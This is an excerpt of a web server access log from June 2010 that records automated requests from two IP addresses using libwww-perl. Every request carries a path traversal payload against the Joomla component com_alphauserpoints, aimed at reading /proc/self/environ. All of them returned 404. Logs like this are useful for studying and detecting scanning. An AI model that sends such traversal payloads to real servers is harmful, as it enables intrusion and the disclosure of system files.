216.180.240.110 - - [28/Jun/2010:07:37:25 -0500] "GET /logs//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:07:37:29 -0500] "GET /logs/access_log.1274832000//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:07:37:29 -0500] "GET //*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.831"
216.180.240.110 - - [28/Jun/2010:07:37:29 -0500] "GET /logs//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
66.191.139.210 - - [28/Jun/2010:07:38:35 -0500] "GET /logs/access_log.1274832000//*.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.805"
